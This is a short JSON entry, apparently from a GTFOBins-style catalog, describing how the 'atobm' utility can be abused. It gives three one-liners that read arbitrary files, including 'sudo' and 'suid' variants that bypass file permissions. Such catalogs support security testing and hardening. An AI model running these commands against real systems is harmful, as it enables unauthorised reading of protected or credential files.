You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

21 lines
549 B
JSON

{
"description": "Outputs the first line of the file to standard error without the '-' and '#' characters, this can be customized with the '-c' option, by default is '-c -#'.",
"functions": {
"file-read": [
{
"code": "atobm [file] 2>&1 | awk -F \"'\" '{printf \"%s\", $2}'\n"
}
],
"sudo": [
{
"code": "sudo atobm [file] 2>&1 | awk -F \"'\" '{printf \"%s\", $2}'\n"
}
],
"suid": [
{
"code": "./atobm [file] 2>&1 | awk -F \"'\" '{printf \"%s\", $2}'\n"
}
]
}
}